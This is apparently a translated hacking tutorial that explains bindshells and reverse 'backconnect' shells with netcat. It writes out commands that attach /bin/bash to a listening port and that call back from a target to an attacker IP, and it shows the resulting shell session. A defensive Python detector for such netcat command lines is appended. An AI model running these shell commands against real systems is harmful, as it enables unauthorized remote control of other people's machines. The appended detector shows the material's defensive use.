What is a remote connection?
In the title I wrote “Interactive Console” in parentheses, and that is intentional. A remote connection here means connecting to a remote host/computer, through a port that has been opened, to get an interactive console on it. It is as if we were sitting directly in front of that computer with a console application open. In this case, however, we are at a distance and working from our own computer, while the console we get is attached directly to the target computer, so every command we type is sent straight to the target. That is the interactive console.
Get Console!
Getting an interactive console is very important in hacking. Besides speed and accuracy, we can send commands to the target computer more freely and leave fewer logs. With an interactive console we can also jump to another session on the same computer, e.g. to log into the MySQL server, run root exploits, etc.
There are many ways, techniques, methods, tactics, tricks, and strategies to get a console remotely, starting from a webshell, RCE, LFI, RFI, or by sending ninjas into the target computer to help us make the remote connection.
There are two ways to get this interactive console: bindshell and backconnect.
BindShell
A bindshell opens (binds) a port on the victim’s computer and attaches a service/application that will serve the connections received on that open port. The application generally used is /bin/bash. When a connection arrives at the open port, the victim’s computer runs /bin/bash and hands it to the attacker. It is called a bindshell because the bind is done together with providing a shell service (/bin/bash). An attacker who connects to the bound port therefore gets a /bin/bash from the victim’s computer. That is an interactive console.
# BindShell with netcat
With netcat, we can open a listening port on the victim’s computer. The -l option is included in the netcat command to create a listening port.
nc -v -l -p [port] -e [service/application]
example: ./nc -v -l -p 4444 -e /bin/bash &
-v: verbose. Shows verbose output from the server when a connection is made.
-l: listening mode (waiting for a connection)
-p: the port to open
-e: sets the service/application to run
After successfully opening the shell port (listening port), we connect to it from our PC:
nc -vv [ip shell] [port]
BackConnect
Backconnect means making the remote connection from the target computer to our computer. Where a bindshell is a remote connection from our computer to the target, backconnect is the reverse: from the target computer to ours. Backconnect is the alternative when a bindshell fails, whether because we have no access, access is denied, the firewall’s security blocks it, or the target computer sits behind a proxy server (the target is inside a network fronted by a proxy). If there is a proxy in front of the target computer, then even though the bind succeeds we still cannot connect to the target, because the proxy shields it.
When we connect, our connection is rejected because the port we are heading for is not open on the firewall. The firewall rejects all connections/requests to ports that are not opened in it. The packets carrying the attacker’s request cannot pass the firewall because no path is open for them, so the connection request never reaches the target computer.
# Backconnect with Netcat
To be able to do a backconnect, our IP must be a public IP, i.e. one connected directly to the internet with no proxy in between. Doing a backconnect is very easy, as easy as a bindshell. The first thing to do is set listening mode on our computer. Just listening mode, without any application, because we will accept the application launched by the target computer.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 …
Our computer is now listening. Next we connect the target computer to ours by launching /bin/bash. As usual, netcat must be present on the target computer. Download netcat to the target computer and put it in a writable directory, or just write it to /tmp. The command for backconnect is:
nc -vv [attacker ip] [port] -e [application to launch]
example: ./nc 192.168.10.20 6888 -vv -e /bin/bash
After running this command on the target computer, look at our computer. We have received a connection back from the target computer and immediately accept the application it launched toward us.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 …
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname -a
Astra.2014.ws Linux 2.6.18-164.el5 #1 SMP Wed Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* Bold text: the commands we type.
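An added example, not part of the original post: a defender-side check that classifies process command lines matching the two netcat forms described above (a listener started with -e is a bindshell, an outbound connect with -e is a backconnect). The process list, the PIDs and the set of shell paths are constructed assumptions.

```python
import shlex

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh"}  # assumption: shells worth flagging
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional"}

def classify(cmdline):
    """Return 'bindshell', 'backconnect' or None for one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes: cannot be parsed
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listen, program, positional, i = False, None, [], 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and len(arg) > 1:
            # Walk clustered short flags such as -vlp; only -p and -e values are modelled.
            for pos, flag in enumerate(arg[1:], start=1):
                if flag == "l":
                    listen = True
                elif flag in ("p", "e"):
                    value = arg[pos + 1:]   # value glued to the flag, e.g. -p4444
                    if not value and i + 1 < len(argv):
                        i += 1              # value is the next argv element
                        value = argv[i]
                    if flag == "e":
                        program = value
                    break
        else:
            positional.append(arg)          # host and port of an outbound connect
        i += 1
    if program not in SHELLS or not (listen or len(positional) >= 2):
        return None
    return "bindshell" if listen else "backconnect"

SAMPLE_PROCESSES = [  # constructed process list using the command forms shown on this page
    (2301, "./nc -v -l -p 4444 -e /bin/bash"),
    (2417, "./nc 192.168.10.20 6888 -vv -e /bin/bash"),
    (2502, "nc -vlp 6888"),                 # plain listener, no program attached
    (2610, "/usr/sbin/httpd -k start"),
]

def scan(processes):
    return [(pid, kind) for pid, cmd in processes if (kind := classify(cmd))]

if __name__ == "__main__":
    print(scan(SAMPLE_PROCESSES))
```

Command-line matching only catches netcat run under its usual names; a renamed binary needs a different signal, such as a shell process whose standard input is a network socket.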
credits: gameover ‘n Array